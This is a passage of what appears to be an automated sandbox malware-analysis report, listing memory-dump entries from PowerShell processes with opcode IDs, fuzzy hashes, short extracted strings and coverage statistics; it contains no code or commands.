                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b27fb49db74b6a7ed02ee1cbde8e7364e252b8ed853de8ba513b79c80e5eb118
                                                                                                                                                                            • Instruction ID: da386ac3efa007563289cbde102c803bac0b3670c1ceaace53b387e3f7624d81
                                                                                                                                                                            • Opcode Fuzzy Hash: b27fb49db74b6a7ed02ee1cbde8e7364e252b8ed853de8ba513b79c80e5eb118
                                                                                                                                                                            • Instruction Fuzzy Hash: B3F0BE717002045BD710AA69D0587EF77AAEFC5628F108179CA1947389CE3E3806CBB1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c852fb3bc5871a77ecc181aeaca04b6ad23229dcbcbe16d9e40227066fba9e36
                                                                                                                                                                            • Instruction ID: 95b8b4956d2b4527c65e55b83d11bdd29298b2158609a2bdc64c4d2c87183f36
                                                                                                                                                                            • Opcode Fuzzy Hash: c852fb3bc5871a77ecc181aeaca04b6ad23229dcbcbe16d9e40227066fba9e36
                                                                                                                                                                            • Instruction Fuzzy Hash: 5FE065393001188F83109B1DE888C26BBFAEFCE626B1540AAF549CB324CB31EC018B94
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 488f15714a7c00a53192481111720fbc59a99811403a9ab6b35101d6d96c1207
                                                                                                                                                                            • Instruction ID: 49516d44a064e54ea23ac1ac7fbbac6ffd7271cf8ed1f44d5e162f395ab27748
                                                                                                                                                                            • Opcode Fuzzy Hash: 488f15714a7c00a53192481111720fbc59a99811403a9ab6b35101d6d96c1207
                                                                                                                                                                            • Instruction Fuzzy Hash: 39E0261274C3DD078B2A413E6C184776FB749C302130881FAA1A4CB647EF42CC094390
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3ce34ae78f29a1e2b033efe35172c1830532ae50e4cb6d5ef5b4761efe343f08
                                                                                                                                                                            • Instruction ID: 3c0db79794df6c506d05214ee1b041b173698358b9a53568e72a536c42a79772
                                                                                                                                                                            • Opcode Fuzzy Hash: 3ce34ae78f29a1e2b033efe35172c1830532ae50e4cb6d5ef5b4761efe343f08
                                                                                                                                                                            • Instruction Fuzzy Hash: C5E0E53130471457CB082B79941C1EE7A66DBC4325F04C02EE61983242CF29690287D5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 03b88c7d4ce55c122bae9dcd5f17195d49b4d493131fc9a81f06a95fc6c1d1d2
                                                                                                                                                                            • Instruction ID: 4d62c5e94eab1d4382997835bae3761357dfeed076a6adb00a3b6ba8ada2501a
                                                                                                                                                                            • Opcode Fuzzy Hash: 03b88c7d4ce55c122bae9dcd5f17195d49b4d493131fc9a81f06a95fc6c1d1d2
                                                                                                                                                                            • Instruction Fuzzy Hash: B1E0923081924DA7CF19ABBCD84E8FD7F30FA11310F0041ADE41292556EB20A547CAD1
                                                                                                                                                                            Memory Dump Source
• Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fd7031a73c24d8c70b7ff89756549476900300f8401945f3cdc01f91b5ddf67d
• Instruction ID: e7a338460120c89000a11be5ecf430181dc9b09a14c9e20376025348c8529e47
• Opcode Fuzzy Hash: fd7031a73c24d8c70b7ff89756549476900300f8401945f3cdc01f91b5ddf67d
• Instruction Fuzzy Hash: 78F0E534D1834DAFC724DB6CD4498B97FB2EB0A310F0042A8DA85972C6D7316883CB89
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ,bq$0oAp$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-3629103054
                                                                                                                                                                            • Opcode ID: 92980bf11450c3cde340f64e3aac8ccfc04b156577a00bddf257ddd54369ce57
                                                                                                                                                                            • Instruction ID: b04c4c5fa425733bb13cedcba0a3c5aa8b3116eec3f8b039bd70171a3c0cb5a6
                                                                                                                                                                            • Opcode Fuzzy Hash: 92980bf11450c3cde340f64e3aac8ccfc04b156577a00bddf257ddd54369ce57
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A51532038811D8BCB2DABBD55A493C3AB37B8875031198AAD456CF369EF1DC8C24753
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2468530973.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7b60000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: fcq$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-2306644927
                                                                                                                                                                            • Opcode ID: 976c065c89949632632c874f34c6aad8e2fe87705164414b7c17e1322ec1057e
                                                                                                                                                                            • Instruction ID: 0b4ae343eaba002fc779d9c1264a1c72f65b939f395fc9411858a4367e5daf46
                                                                                                                                                                            • Opcode Fuzzy Hash: 976c065c89949632632c874f34c6aad8e2fe87705164414b7c17e1322ec1057e
                                                                                                                                                                            • Instruction Fuzzy Hash: 51615BF0A1020EDFEB24CE4DC548BAAB7F6FB45315F5480D6EA019B2A1C739D885CB61
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2468530973.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7b60000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-3865595929
                                                                                                                                                                            • Opcode ID: 48157b29643e0b1ba54e3d178429bdcc07c8ca293b4c3450320c0efd80f5acef
                                                                                                                                                                            • Instruction ID: 16959b1ac5a8673d293ce3d80dbb6b7b4898cd911ae477670fca50efcfbbfbc2
                                                                                                                                                                            • Opcode Fuzzy Hash: 48157b29643e0b1ba54e3d178429bdcc07c8ca293b4c3450320c0efd80f5acef
                                                                                                                                                                            • Instruction Fuzzy Hash: 93A15AF17043058FE7249A69980876ABBF6EFC5710F1884AEE646CB391DE39C885C761
Strings
Memory Dump Source
• Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
Similarity
• API ID:
• String ID: 0oAp$0oAp$0oAp$`Q^q$$^q$$^q$$^q
• API String ID: 0-1375766648
• Opcode ID: 60a3993988148b3194725cad07f9d75f466d9df1006c01f372679915755aca18
• Instruction ID: cf8c6256910c6a8ccba012cee330147c82d85ee998842d6fd33e86bfbb1c52b6
• Opcode Fuzzy Hash: 60a3993988148b3194725cad07f9d75f466d9df1006c01f372679915755aca18
• Instruction Fuzzy Hash: BBE1B3307541188FDB28AB7D8454A3F76EBAFC9B10B2544AAD802DB3A5EF25DC438791
Strings
Memory Dump Source
• Source File: 00000015.00000002.2468530973.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_7b60000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$4'^q$4'^q$pipj$tP^q$tP^q
• API String ID: 0-499639324
• Opcode ID: 7cbf93b7bfa0b9f1b4fe04fe278fb2b73f6090572824b7eba35e5b6ea5dc2cff
• Instruction ID: 012e70dc541374972be43290d94751873a6ab786fb5815da81c361e1ab021f68
• Opcode Fuzzy Hash: 7cbf93b7bfa0b9f1b4fe04fe278fb2b73f6090572824b7eba35e5b6ea5dc2cff
• Instruction Fuzzy Hash: 6DD128B1B0420E8FEB259B6D94086AABBF6EFC5311F1484FBC6058F255DB39C885C791
Strings
Memory Dump Source
• Source File: 00000015.00000002.2468530973.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_7b60000_powershell.jbxd
Similarity
• API ID:
• String ID: fcq$4'^q$4'^q$4'^q$4'^q
• API String ID: 0-2717029046
• Opcode ID: 2c72c1bb5e5cd9b6c77a0cc8dc89ccf7676a2d963bc7fbf8c872a1f9b088f43a
• Instruction ID: dfe41c4c4dd445c2dce19ada0b3b727eda1794ddd78877ae7c7ddcf13bcdcdca
• Opcode Fuzzy Hash: 2c72c1bb5e5cd9b6c77a0cc8dc89ccf7676a2d963bc7fbf8c872a1f9b088f43a
• Instruction Fuzzy Hash: 8AF17CB17043458FDB25AB69D414B6ABBE2EFC2210F14C0FBD645CB292DA39CC81C7A1
Strings
Memory Dump Source
• Source File: 00000015.00000002.2468530973.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_7b60000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$$^q$$^q$$^q
• API String ID: 0-3272787073
• Opcode ID: 5d6dd74cc665908a91408d42d5763c19e655f3bcc94f90537312bf4ddd483898
• Instruction ID: a2e56511ad6178c8341d521e8f29e8d1029907317698d1dd79b2e5463eb93ae4
• Opcode Fuzzy Hash: 5d6dd74cc665908a91408d42d5763c19e655f3bcc94f90537312bf4ddd483898
• Instruction Fuzzy Hash: DE513AF17043069FEB245A6994087B6BBE6EFC2620F1484ABD605CB351DE3DC885C7A1
Strings
Memory Dump Source
• Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
Similarity
• API ID:
• String ID: `_q$`_q$`_q$`_q
• API String ID: 0-3297199963
• Opcode ID: 4eeb5f717a8617e61d829ecab64018390a0ab0de1f4347531ffb8067f7c34fb5
• Instruction ID: 7242abb70ac60b80d0c4e2034af26b5758d596f8faf2c30b1fd80dcdf662bc89
• Opcode Fuzzy Hash: 4eeb5f717a8617e61d829ecab64018390a0ab0de1f4347531ffb8067f7c34fb5
• Instruction Fuzzy Hash: 6FB19474E006199FCB54DFA9D990A9DFBF2FF88300F10862AD419AB314EB34A945CF90
Strings
Memory Dump Source
• Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
Similarity
• API ID:
• String ID: `_q$`_q$`_q$`_q
• API String ID: 0-3297199963
• Opcode ID: 6e5c3fd496f0ea02c12992d260537c2a7e94ab8e3db43bbf9086ec112ce2f7eb
• Instruction ID: 8e76b8d36315c14ed81ea88e863db804f4b1b0bfaf9426cd6f5419d950ed5c7d
• Opcode Fuzzy Hash: 6e5c3fd496f0ea02c12992d260537c2a7e94ab8e3db43bbf9086ec112ce2f7eb
• Instruction Fuzzy Hash: D4B19374E006199FCB54DFA9D990A9DFBF2FF88300F10862AD419AB314EB35A945CF90
Strings
Memory Dump Source
• Source File: 00000015.00000002.2468530973.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_7b60000_powershell.jbxd
Similarity
• API ID:
• String ID: $^q$$^q$$^q$$^q
• API String ID: 0-2125118731
• Opcode ID: 4283d8274e6c667d33b0e876eb7ad2af110a0c8c304fb23d0782cbfbff8c75a2
• Instruction ID: af6b96efde3f09c35717f62c71989111dc993996e05bb116a4176d10a7dec021
• Opcode Fuzzy Hash: 4283d8274e6c667d33b0e876eb7ad2af110a0c8c304fb23d0782cbfbff8c75a2
• Instruction Fuzzy Hash: BE2129F170030A9BEB38592A984CB37A7DAAFC0B15F24846AA605CF785DD7DC8618371
Strings
Memory Dump Source
• Source File: 00000015.00000002.2468530973.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_7b60000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$$^q$$^q
• API String ID: 0-2049395529
• Opcode ID: c57a611372f1aafb8059292f9cc5d0457e053e8c728190f888910e2a27a9a04e
• Instruction ID: e2fc9df49d77dfe08e7edb7c7a18b1fafef8aa22c2f0b228b727aab7876a14bf
• Opcode Fuzzy Hash: c57a611372f1aafb8059292f9cc5d0457e053e8c728190f888910e2a27a9a04e
• Instruction Fuzzy Hash: 9701D1A1B4D39A5FD72B262918285546FF2AF8395031A45EBC140CF29BCD1A4C4D87A7

Execution Graph

Execution Coverage: 5.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000017.00000002.2590210505.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4670000_powershell.jbxd
Similarity
• API ID:
• String ID: [TDn^$kTDn^${TDn^$[Dn^
• API String ID: 0-1515681306
• Opcode ID: 53ac42df71edfcf31f8c6e80d53cbc427111c2e2efb66744f60f9f5c0e392fd6
• Instruction ID: 89caf719afd52891fcfadd40f3ff3289c60f1fbfc630f420f7abeef4cb5cf130
• Opcode Fuzzy Hash: 53ac42df71edfcf31f8c6e80d53cbc427111c2e2efb66744f60f9f5c0e392fd6
• Instruction Fuzzy Hash: 52918575F006146BDB1AEFB4D8145AEB7E3DF85704B00892DD00AAB344DF74AD0A8BD6

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000017.00000002.2590210505.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4670000_powershell.jbxd
Similarity
• API ID:
• String ID: [TDn^$kTDn^${TDn^$[Dn^
• API String ID: 0-1515681306
• Opcode ID: a34a1a0ddcd8c83b680f57413fec709014c8511911d2ace45e0e849523bc9616
• Instruction ID: 32e8d2e5f82b08740af07ac67431c64cc52aa48f3bb9c8c79ac925bc721fa13c
• Opcode Fuzzy Hash: a34a1a0ddcd8c83b680f57413fec709014c8511911d2ace45e0e849523bc9616
• Instruction Fuzzy Hash: F99131B5F006196BDF19EFB498145AEB7E3EF84704B00892DD10AAB344DF74AD068BD6

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000017.00000002.2622293718.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_70a0000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$pipj$pipj$pipj$pipj$pipj$|,rj
• API String ID: 0-1806894991
• Opcode ID: 403b7124da4508c49ce8eabbc8af5e57cd0d65f9ba45c3cb55e9865904fffca1
• Instruction ID: f26e000ad7e61e3a25b6527e20a95c54877f2468297555545900a8ffcce6c4a3
• Opcode Fuzzy Hash: 403b7124da4508c49ce8eabbc8af5e57cd0d65f9ba45c3cb55e9865904fffca1
• Instruction Fuzzy Hash: 260229B1B00206AFCF54DFA9D4406AABBE6BFC6210F1485BAE415CB251DB35CD85C7A1

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000017.00000002.2622293718.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_70a0000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$4'^q$4'^q
• API String ID: 0-1420252700
• Opcode ID: 7818b1ed77deabdb97e1f26b5f69b0278c754027bfcedc03392823b212f4def2
• Instruction ID: 404d6b14006f609f442c1594089e5f0886072d55e93c7188d4cd365ffac7245f
• Opcode Fuzzy Hash: 7818b1ed77deabdb97e1f26b5f69b0278c754027bfcedc03392823b212f4def2
• Instruction Fuzzy Hash: 8C1247B5B04346AFCB559BAC980076ABBE6AFC2310F24817AE445CF391DF75C885C7A1

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000017.00000002.2590210505.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4670000_powershell.jbxd
Similarity
• API ID:
• String ID: bq$4'^q
• API String ID: 0-1488691314
• Opcode ID: 802fe9b6f1521aaf819bfae7b74dc92a42158532f5e92deead3a30413307220b
• Instruction ID: 57dd5d58cef069b92348110efe48d89cf15346af16dfbc025453ad8f5592b92d
• Opcode Fuzzy Hash: 802fe9b6f1521aaf819bfae7b74dc92a42158532f5e92deead3a30413307220b
• Instruction Fuzzy Hash: 61919F34B002058FCB04DF68D450AAEBBF2EF89314F1584A8D005AF365DB75EC4ACB91

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000017.00000002.2628149258.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_8270000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0
• Opcode ID: 39847e741b03141305c8a4a5e49a846e21c3332a2dea177fb4086aaf2bde87e2
• Instruction ID: 56a8c6cf857b24fe06ca3ae647c9dbb4f7f64757128246311bc0939245ff353a
• Opcode Fuzzy Hash: 39847e741b03141305c8a4a5e49a846e21c3332a2dea177fb4086aaf2bde87e2
• Instruction Fuzzy Hash: 131143B19003099FDB10CFAAC884BDEFFF4EB48324F24842AD459A3210C775A944CFA4
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2628149258.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_8270000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ThreadToken
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3254676861-0
                                                                                                                                                                            • Opcode ID: 50ce02ffffc4c5d802ffca253952faf5ac1c4fad0d7ad6a0c5eea265e895b94e
                                                                                                                                                                            • Instruction ID: 569d1ca713d7a285926a13c46959f8d9d09a0e73a9815d85ba92127990971c28
                                                                                                                                                                            • Opcode Fuzzy Hash: 50ce02ffffc4c5d802ffca253952faf5ac1c4fad0d7ad6a0c5eea265e895b94e
                                                                                                                                                                            • Instruction Fuzzy Hash: 5F1136B19003088FDB10CF9AC944BDEFBF4EB48324F14842AD459A7310C775A944CFA4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2590210505.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_4670000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (bq
                                                                                                                                                                            • API String ID: 0-149360118
                                                                                                                                                                            • Opcode ID: f04142c525b3af5209ab737438faf64e003219aafda033e51c7f72925ecf85cb
                                                                                                                                                                            • Instruction ID: 45b266b5e04941304c072cd9aed2d29019499451d323d65f3d550b5602df635e
                                                                                                                                                                            • Opcode Fuzzy Hash: f04142c525b3af5209ab737438faf64e003219aafda033e51c7f72925ecf85cb
                                                                                                                                                                            • Instruction Fuzzy Hash: 49415C78B042548FCB15DF68C554AA97BF2EF8E311F2440A9E406EB3A1EB35ED42CB51
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2590210505.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_4670000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (&^q
                                                                                                                                                                            • API String ID: 0-2067289071
                                                                                                                                                                            • Opcode ID: 68d6b2ae64b031738cf0f62d3eedba0a1e93117af4b14c303692755707826b3d
                                                                                                                                                                            • Instruction ID: fac51ac0dc226e10dbea64ed172c8490216f56b08767d2f20e9b51e14f34fae2
                                                                                                                                                                            • Opcode Fuzzy Hash: 68d6b2ae64b031738cf0f62d3eedba0a1e93117af4b14c303692755707826b3d
                                                                                                                                                                            • Instruction Fuzzy Hash: 88219A75A042588FCB14DFAED80469EBBF6EB88324F24846AD019E7340DB75A8058FA5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2590210505.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_4670000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dc419f1b7578c26817ddd446b1d23c00e7eac5e973fde7f8f056dee9ec9790cf
                                                                                                                                                                            • Instruction ID: 29a61680211ac9cff19d8b4a8c825fae3423e6547e590ab6451c8aad704a6a8e
                                                                                                                                                                            • Opcode Fuzzy Hash: dc419f1b7578c26817ddd446b1d23c00e7eac5e973fde7f8f056dee9ec9790cf
                                                                                                                                                                            • Instruction Fuzzy Hash: E1A1CDB0A042458FCB06CF5CC4A49AAFBB1FF49310B25859AD5559B3A6D735FC81CBA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2622293718.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_70a0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 29a94a4340fa36b89a0fe97f935612d9ed0e8b227580c401573f8567c97baa89
                                                                                                                                                                            • Instruction ID: 19b3dbbbb6f2db005c6f33a3450a2257a89e593da7c37bcddb8a00c4e77b3f65
                                                                                                                                                                            • Opcode Fuzzy Hash: 29a94a4340fa36b89a0fe97f935612d9ed0e8b227580c401573f8567c97baa89
                                                                                                                                                                            • Instruction Fuzzy Hash: D6512EB1714245AFCB6197A89840B6EBBE6BFC9310F1441BAD505CF351DE35DC81C7A2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2590210505.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_4670000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 38baa33d596e963a1421e66dfc8533944069d2626e369376cc6af2d459671849
                                                                                                                                                                            • Instruction ID: 277305d0c9551e5b6457f6bbc9e180f1038a93c99ff5cf2304b5a4179a6fa37d
                                                                                                                                                                            • Opcode Fuzzy Hash: 38baa33d596e963a1421e66dfc8533944069d2626e369376cc6af2d459671849
                                                                                                                                                                            • Instruction Fuzzy Hash: A66116B1E002489FCB14CFA9D58469DFBF1FF88314F18816AE819AB364EB31AC45CB50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2590210505.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_4670000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4422cfacd2090d3da8b9a80f8a8091c075d6a6c13e43c5feef676d1cadb8b9c4
                                                                                                                                                                            • Instruction ID: c078b7d4f5400e4cc52fa57c82419122837acd260f1957864d70d2efc9fbb285
                                                                                                                                                                            • Opcode Fuzzy Hash: 4422cfacd2090d3da8b9a80f8a8091c075d6a6c13e43c5feef676d1cadb8b9c4
                                                                                                                                                                            • Instruction Fuzzy Hash: 275118B1E00248DFDB14DFA9D584A9DFFF1EF88714F18806AE819AB354EB35A845CB50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2622293718.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_70a0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 95c3969cc184625e10de09aa24cba8f4fcd4320006c02bcde978e3c645f33c24
                                                                                                                                                                            • Instruction ID: 57fc2d2f2360b987c0df32779a6bb3a136815c4922150cb705bb90615969b4cb
                                                                                                                                                                            • Opcode Fuzzy Hash: 95c3969cc184625e10de09aa24cba8f4fcd4320006c02bcde978e3c645f33c24
                                                                                                                                                                            • Instruction Fuzzy Hash: D031F5F0B00202EBCB64CEA9D941A6AFBF6AF90658F15C265D9019F391DB35DC84C7A1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2590210505.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_4670000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 74b97b620330837bdd21b2506f007ed5224a2e064b9ae3357bd790d4a8402d9e
                                                                                                                                                                            • Instruction ID: ca6384a78a0fdc23478b6384298372d75b71f2f03ccc15afb439db47d2810d8d
                                                                                                                                                                            • Opcode Fuzzy Hash: 74b97b620330837bdd21b2506f007ed5224a2e064b9ae3357bd790d4a8402d9e
                                                                                                                                                                            • Instruction Fuzzy Hash: 14311978B04205CFCB14CF69D594AAABBF5AF8D616F244059E806AB391EB31FC41CB60
                                                                                                                                                                            Memory Dump Source
• Source File: 00000017.00000002.2590210505.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false
Joe Sandbox IDA Plugin
